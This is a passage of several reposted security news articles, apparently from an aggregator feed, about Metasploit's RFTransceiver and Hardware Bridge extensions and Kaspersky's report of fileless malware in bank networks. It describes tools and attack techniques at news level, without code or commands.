Using the RFTransceiver companies will “be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.”

Smith took as an example the discovery of a vulnerability in a medical insulin pump made in 2016 by researchers at Rapid7.

One of the most disconcerting discoveries made by the researcher was that the remote control and the pump communicated over an unencrypted channel. An attacker might have exploited a flaw tracked as CVE-2016-5084 to launch a man-in-the-middle (MitM) attack to intercept patient treatment and device data. The only consolation is that data exposed do not include any personally identifiable information.

“We strongly believe that RF testing is an incredibly important — though currently often overlooked — component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk.” wrote Smith,  “We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.”

Many organizations already use devices operating on radio frequencies outside 802.11. RFID readers, components using the Zigbee communication protocol, and surveillance systems.

The RFTransceiver extension is designed to help organizations testing them and evaluate the response to outside interference.

The new Metasploit RFTransceiver radio frequency extension could be used for testing purposes but there is the risk that crooks could abuse its capabilities to find vulnerabilities and exploit them.

The response to the common criticism of any kind of “dual use” technology is that bad guy are already exploiting it as the attack vector, for this reason, it is important to understand and anticipate the attackers’ moves.

“The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.”

Experts that want to use the new Metasploit RFTransceiver extension have to buy an RfCat-compatible device like the Yard Stick One. Then they need to download the latest RfCat drivers, included with those drivers they will find rfcat_msfrelay. This is the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat compatible device attached.

Source:https://securityaffairs.co/

The post New Metasploit RFTransceiver extension allows testing IoT sevices appeared first on Information Security Newspaper | Hacking News.

The post Penetration testing with Metasploit made easy appeared first on Information Security Newspaper | Hacking News.

Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShell, Metasploit, and Mimikatz—to inject the malware into computer memory.

“What’s interesting here is that these attacks are ongoing globally against banks themselves,” Kaspersky Lab expert Kurt Baumgartner told Ars. “The banks have not been adequately prepared in many cases to deal with this.” He went on to say that people behind the attacks are “pushing money out of the banks from within the banks,” by targeting computers that run automatic teller machines.

The 140 unnamed organizations that have been infected reside in 40 different countries, with the US, France, Ecuador, Kenya, and the UK being the top five most affected nations. The Kaspersky Lab researchers still don’t know if a single group of individuals is behind the attacks, or if they’re being carried out by competing hacker gangs. The use of the fileless malware and command-server domains that aren’t associated with any whois data makes the already difficult task of attribution almost impossible.

Password harvesting

The researchers first discovered the malware late last year, when a bank’s security team found a copy of Meterpreter—an in-memory component of Metasploit—residing inside the physical memory of a Microsoft domain controller. After conducting a forensic analysis, the researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands. The infected machine also used Microsoft’s NETSH networking tool to transport data to attacker-controlled servers. To obtain the administrative privileges necessary to do these things, the attackers also relied on Mimikatz. To reduce the evidence left in logs or hard drives, the attackers stashed the PowerShell commands into the Windows registry.

Fortunately, the evidence on the domain controller was intact, presumably because it hadn’t been restarted before Kaspersky Lab researchers began their investigation. An analysis of the dumped memory contents and the Windows registries allowed the researchers to restore the Meterpreter and Mimikatz code. The attackers, the researchers later determined, had used the tools to collect passwords of system administrators and for the remote administration of infected host machines.

“We’re talking about a lot of incidents” that often varied in the way they were carried out, Baumgartner said of the infections the researchers found in the months following their initial discovery. “We’re looking at the common denominator across all of these incidents, which happens to be this odd use in embedding PowerShell into the registry in order to download Meterpretor and then carry out actions from there with native Windows utilities and system administrative tools.”

The researchers don’t yet know how the malware initially takes hold. Possible vectors include SQL-injection attacks and exploits targeting plugins for the WordPress content management application. Kaspersky Lab plans to provide more details in April about how the infections were used to siphon money out of ATMs.

Source:https://arstechnica.com/

The post A rash of invisible, fileless malware is infecting banks around the globe appeared first on Information Security Newspaper | Hacking News.

The popular offensive hacking toolkit Metasploit now is powerful, it included a hardware bridge to conduct security tests on hardware. It is a great support to the users that have to test hardware, including IoT devices.

Metasploit already includes more than 1,600 exploits and 3,300 modules, with a huge hacking community that works on news modules and scripts.

Up until now, the Metasploit allowed the creation of custom scripts for hardware testing, now the update to the Hardware Bridge API will allow users to test a variety of hardware including vehicles’ CAN buses.

The new Hardware Bridge API gives a precious instrument to customers focused on the development of hardware exploits.

The first update to the Hardware Bridge API focuses is specifically designed for the testing of automotive systems, Rapid7 that manages the tool will soon add other modules to extend the capabilities of its product.

Metasploit aim to be an institutional tool for a wide range of hardware platforms, including SCADA and industrial control systems (ICS), IoT systems, and software defined radio (SDR). The company believes the new capability makes Metasploit an ideal tool for conducting hardware-based network research.

“Metasploit condensed a slew of independent software exploits and tools into one framework and now we want to do the same for hardware,”

“Every wave of connected devices – regardless of whether you’re talking about cars or refrigerators – blurs the line between hardware and software. As we like to say, this hardware bridge lets you exit the Matrix and directly affect real, physical things,” explained Craig Smith, director of transportation research at Rapid7. “We’re working to give security professionals the resources they need to test and ensure the safety of their products — no matter what side of the virtual divide they’re on.”

Soruce:https://securityaffairs.co

The post Popular hacking toolkit Metasploit adds hardware testing capabilities appeared first on Information Security Newspaper | Hacking News.